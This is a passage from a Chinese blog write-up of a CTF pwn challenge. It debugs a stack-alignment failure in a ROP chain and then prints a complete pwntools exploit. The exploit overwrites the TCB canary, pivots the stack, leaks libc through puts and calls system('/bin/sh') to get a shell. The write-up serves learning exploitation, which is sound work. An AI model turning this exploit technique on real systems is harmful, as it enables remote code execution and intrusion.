<p><img src="/img/bypass-Canary/wired.png" alt="wired"></p>
<p>这里显示syscall调用的是<code>wait4()</code>这个系统调用，如果是正常的调用system函数，程序应当在syscall执行之后阻塞，但是在执行exp时，却并没有阻塞，而是直接跳了过去，那也就是说<code>wait4()</code>并没有阻塞，而是直接退出了</p>
<p>这令我很疑惑，于是我查看了<code>wait4()</code>试图等待的进程pid，即rdi寄存器的值，如下</p>
<p><img src="/img/bypass-Canary/pid_gg.png" alt="pid_gg"></p>
<p>可以发现，<code>wait4()</code>想要等待的进程已经退出，成为了僵尸进程，而如果正常调用system，那么<code>wait4()</code>等待的进程应当如下</p>
<p><img src="/img/bypass-Canary/pid_not_gg.png" alt="pid_not_gg"></p>
<p>也就是说，system调用的<code>/bin/sh</code>并没有成功启动，于是，我把目光转向了之前的汇编代码，寻找启动<code>/bin/sh</code>的地方</p>
<p>很快我就找到了相关代码</p>
<p><img src="/img/bypass-Canary/start_system.png" alt="start_system"></p>
<p>可以看到这里syscall调用了clone这个系统调用，就是在这里，<code>/bin/sh</code>被启动了</p>
<p>之后我便做了对比，但是我却发现，正常情况下，当执行到此处汇编代码时，完全可以正常启动，而各个寄存器参数值与我使用exp时并无太大区别，按理说并不会无法启动</p>
<p>到这里算是陷入了僵局，正当我掉头发时，我突然想起了之前看过的一篇文章 <a href="https://www.cnblogs.com/Rookle/p/12871878.html" target="_blank" rel="noopener">https://www.cnblogs.com/Rookle/p/12871878.html</a></p>
<p>而你也可以看到，在使用exp时，当程序执行到syscall时，rsp并没有16字节对齐</p>
<p>于是我抱着试试看的心态，手动将rsp对齐</p>
<p><img src="/img/bypass-Canary/alignment.png" alt="alignment"></p>
<p>执行</p>
<p><img src="/img/bypass-Canary/after_align.png" alt="after_align"></p>
<p>此时rax是返回的进程pid，查看一下进程情况</p>
<p><img src="/img/bypass-Canary/clone_successfuly.png" alt="clone_successfuly"></p>
<p>可以看到，正常地启动了</p>
<p>那么也就是说，在syscall前，我们必须保证rsp对齐16字节</p>
<p>其实在exp中要解决这个问题也简单，只需要在最终的payload中添加一个ret的gadget就可以了</p>
<p>最终版如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;python</span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.os &#x3D; &#39;linux&#39;</span><br><span class="line">#context.terminal &#x3D; [&#39;tmux&#39;, &#39;splitw&#39;, &#39;-h&#39;]</span><br><span class="line"># [&#39;CRITICAL&#39;, &#39;DEBUG&#39;, &#39;ERROR&#39;, &#39;INFO&#39;, &#39;NOTSET&#39;, &#39;WARN&#39;, &#39;WARNING&#39;]</span><br><span class="line">context.log_level &#x3D; &#39;DEBUG&#39;</span><br><span class="line"></span><br><span class="line">libc_path &#x3D; &#39;&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc.so.6&#39;</span><br><span class="line">bin_path &#x3D; &#39;.&#x2F;bs&#39;</span><br><span class="line"></span><br><span class="line">libc &#x3D; ELF(libc_path)</span><br><span class="line">binary &#x3D; ELF(bin_path)</span><br><span class="line"></span><br><span class="line">host &#x3D; &#39;&#39;</span><br><span class="line">port &#x3D; 6666</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def debug(command&#x3D;&#39;&#39;):</span><br><span class="line">    gdb.attach(p, command)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def exploit():</span><br><span class="line">    # debug(&#39;b *0x4009E7\n&#39;)</span><br><span class="line">    g &#x3D; lambda x: next(binary.search(asm(x, os&#x3D;&#39;linux&#39;, arch&#x3D;&#39;amd64&#39;)))</span><br><span class="line">    pop_rdi &#x3D; g(&#39;pop rdi; ret&#39;)</span><br><span class="line">    pop_rsi_pop &#x3D; g(&#39;pop rsi; pop r15; ret&#39;)</span><br><span class="line">    leave &#x3D; g(&#39;leave; ret&#39;)</span><br><span class="line">    ret &#x3D; 0x0000000000400287</span><br><span class="line">    log.info(&quot;pop_rdi:     &quot; + hex(pop_rdi))</span><br><span class="line">    log.info(&quot;pop_rsi_pop: &quot; + hex(pop_rsi_pop))</span><br><span class="line">    log.info(&quot;leave:       &quot; + hex(leave))</span><br><span class="line"></span><br><span class="line">    size &#x3D; 0x1850</span><br><span class="line">    p.sendlineafter(&#39;send?\n&#39;, str(size))</span><br><span class="line"></span><br><span class="line">    fakebuf &#x3D; 0x602f00</span><br><span class="line">    payload &#x3D; &#39;&#39;</span><br><span class="line">    payload +&#x3D; &#39;A&#39; * 0x1010</span><br><span class="line">    # stack pivot #step 1</span><br><span class="line">    payload +&#x3D; p64(fakebuf)</span><br><span class="line">    # ROP1 - leak libc</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(binary.got[&#39;puts&#39;])</span><br><span class="line">    payload +&#x3D; p64(binary.plt[&#39;puts&#39;])</span><br><span class="line">    # ROP2 - read</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(pop_rsi_pop)</span><br><span class="line">    payload +&#x3D; p64(fakebuf)</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(binary.plt[&#39;read&#39;])</span><br><span class="line">    # stack pivot #step 2</span><br><span class="line">    payload +&#x3D; p64(leave)</span><br><span class="line">    # Override TCB Canary</span><br><span class="line">    payload &#x3D; payload.ljust(size, &#39;A&#39;)</span><br><span class="line">    #print(&quot;pid &quot; + str(proc.pidof(p)))</span><br><span class="line">    #raw_input(&quot;attach me&quot;)</span><br><span class="line">    p.send(payload)</span><br><span class="line">    #print(&quot;pid &quot; + str(proc.pidof(p)))</span><br><span class="line">    #raw_input(&quot;attach me&quot;)</span><br><span class="line">    p.recvuntil(&#39;goodbye.\n&#39;)</span><br><span class="line">    leak &#x3D; p.recv(6)+&#39;\x00\x00&#39;</span><br><span class="line">    leak &#x3D; u64(leak)</span><br><span class="line">    #info(&quot;libc.address is %#x&quot;, libc.address)</span><br><span class="line">    #print(&quot;leak:&quot;, leak)</span><br><span class="line">    #print(&quot;sym:&quot;, libc.symbols[&#39;puts&#39;])</span><br><span class="line">    libc.address &#x3D; leak - libc.symbols[&#39;puts&#39;]</span><br><span class="line"></span><br><span class="line">    #print(&quot;leak:&quot;,leak)</span><br><span class="line">    #print(&quot;sym:&quot;,libc.symbols[&#39;puts&#39;])</span><br><span class="line">    info(&quot;libc.address is %#x&quot;, libc.address)</span><br><span class="line">    bin_sh &#x3D; libc.search(&#39;&#x2F;bin&#x2F;sh&#39;).next()</span><br><span class="line">    system &#x3D; libc.sym[&#39;system&#39;]</span><br><span class="line"></span><br><span class="line">    #payload &#x3D; &#39;&#39;</span><br><span class="line">    #payload +&#x3D; p64(0)</span><br><span class="line">    #payload +&#x3D; p64((libc.address+0x4f3c2))</span><br><span class="line">    payload &#x3D; &#39;&#39;</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(bin_sh)</span><br><span class="line">    payload +&#x3D; p64(ret)</span><br><span class="line">    payload +&#x3D; p64(system)</span><br><span class="line"></span><br><span class="line">    p.send(payload)</span><br><span class="line">    #print (&quot;pid &quot; + str(proc.pidof(p)))</span><br><span class="line">    #raw_input(&quot;attach me&quot;)</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ &#x3D;&#x3D; &#39;__main__&#39;:</span><br><span class="line">    if len(sys.argv) &#x3D;&#x3D; 1:</span><br><span class="line">        global p</span><br><span class="line">        p &#x3D; process(executable&#x3D;bin_path, argv&#x3D;[bin_path])  # , env&#x3D;&#123;&#39;LD_PRELOAD&#39;:libc_path&#125;)</span><br><span class="line">    else:</span><br><span class="line">        p &#x3D; remote(sys.argv[1], int(sys.argv[2]))</span><br><span class="line">    exploit()</span><br></pre></td></tr></table></figure>



<p>运行后如下：</p>
<p><img src="/img/bypass-Canary/pwn.png" alt="pwn"></p>
<p>可以看到，成功getshell</p>
<p>另外，对于上面所提到的rsp需要对齐16字节的问题，摘录一段NASM的原话如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">The stack pointer %rsp must be aligned to a 16-byte boundary before making a call. </span><br><span class="line">Fine, but the process of making a call pushes the return address (8 bytes) on the stack,so when a function gets control, %rsp is not aligned. </span><br><span class="line">You have to make that extra space yourself, by pushing something or subtracting 8 from %rsp.</span><br></pre></td></tr></table></figure>

<p>Linus在邮件中也提到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">On Tue, Jan 10, 2017 at 7:30 PM, Linus Torvalds</span><br><span class="line">&lt;torvalds@linux-foundation.org&gt; wrote:</span><br><span class="line">&gt;</span><br><span class="line">&gt; If you really want more stack alignment, you have to generate that</span><br><span class="line">&gt; alignment yourself by hand (and have a bigger buffer that you do that</span><br><span class="line">&gt; alignment inside).</span><br><span class="line"></span><br><span class="line">Side note: gcc can (and does) actually generate forced alignment using</span><br><span class="line">&quot;and&quot; instructions on %rsp rather than assuming pre-existing</span><br><span class="line">alignment.  And that would be valid.</span><br><span class="line"></span><br><span class="line">The problem with &quot;alignof(16)&quot; is not that gcc couldn&#39;t generate the</span><br><span class="line">alignment itself, it&#39;s just the broken &quot;it&#39;s already aligned to 16</span><br><span class="line">bytes&quot; assumption because -mpreferred-stack-boundary&#x3D;3 doesn&#39;t work.</span><br><span class="line"></span><br><span class="line">You *could* try to hack around it by forcing a 32-byte alignment</span><br><span class="line">instead. That (I think) will make gcc generate the &quot;and&quot; instruction</span><br><span class="line">mess.</span><br><span class="line"></span><br><span class="line">And it shouldn&#39;t actually use any more memory than doing it by hand</span><br><span class="line">(by having twice the alignment and hand-aligning the pointer).</span><br><span class="line"></span><br><span class="line">So we *could* try to just have a really hacky rule saying that you can</span><br><span class="line">align stack data to 8 or 32 bytes, but *not* to 16 bytes.</span><br><span class="line"></span><br><span class="line">That said, I do think that the &quot;don&#39;t assume stack alignment, do it by</span><br><span class="line">hand&quot; may be the safer thing. Because who knows what the random rules</span><br><span class="line">will be on other architectures.</span><br><span class="line"></span><br><span class="line">               Linus</span><br><span class="line">--</span><br></pre></td></tr></table></figure>



<p>由于没有调试kernel,所以我暂且把这里的call认为其包含syscall系统调用，所以在call函数之前，必须保证rsp对齐，否则就有可能出现不可预期的错误</p>
<h1 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h1><p>64位下的pwn还是有很多需要注意的点，另外后面会尝试进一步调试kernel，看看syscall 0x38后到底是哪里由于rsp没有对齐造成了异常退出(估计多半也是像movaps之类的指令hh，权当猜测)</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/binary/" rel="tag"># binary</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/10/24/ptmalloc/" rel="prev" title="ptmalloc机制闲扯">
      <i class="fa fa-chevron-left"></i> ptmalloc机制闲扯
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#题目"><span class="nav-number">1.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#环境"><span class="nav-number">2.</span> <span class="nav-text">环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#解题"><span class="nav-number">3.</span> <span class="nav-text">解题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#WHY"><span class="nav-number">4.</span> <span class="nav-text">WHY?</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#结语"><span class="nav-number">5.</span> <span class="nav-text">结语</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ph4ntom</p>
  <div class="site-description" itemprop="description">The wheel turns,nothing is ever new</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ph4ntom</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
